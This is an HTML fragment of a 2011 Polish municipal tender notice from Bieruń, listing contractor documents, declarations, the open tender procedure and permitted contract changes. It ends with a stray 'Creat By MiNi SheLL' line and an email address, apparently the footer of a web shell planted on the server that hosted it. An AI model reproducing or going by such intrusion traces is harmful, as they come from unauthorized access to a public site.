<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1) 	Oferta jest jawna w całości / części. Strony oferty od ....     do .....    stanowią tajemnicę       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być ujawnione innym uczestnikom postępowania.
W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że oferta wykonawcy jest jawna w całości.
2) 	Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom. W przypadku
    	braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.  
3)	Oświadczenie podmiotów występujących wspólnie - w przypadku ich udziału w postępowaniu.
4) 	Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/-e do zaciągania zobowiązań i składania oświadczeń w imieniu wykonawcy.
5) 	Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji.
6) 	Oświadczenie o  związaniu ofertą  przez okres 30 dni od daty upływu terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z wykonawcą umowy w zakresie:
a.	wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie  z obowiązującą stawką;
b.	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy                       z zachowaniem wymagań określonych  w SIWZ;, jakie osoby te powinny spełniać;
c.	terminu realizacji i jego poszczególnych etapów, w szczególności spowodowane: 
      absencją chorobową, zmianą przepisów, przedłużającymi się procedurami 
                        i związanymi  z uzyskaniem koniecznych uzgodnień, opinii i pozwoleń;
d.	mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
e.	innych zmian, w przypadku gdy konieczność wprowadzenie zmian będzie następstwem zmian lub wytycznych instytucji, która przekazała środki na sfinansowanie zamówienia ;
f.	innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ,                      a które nie wykraczają poza zakres art. 140 ustawy pzp .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych; 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - Kancelaria (parter), 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com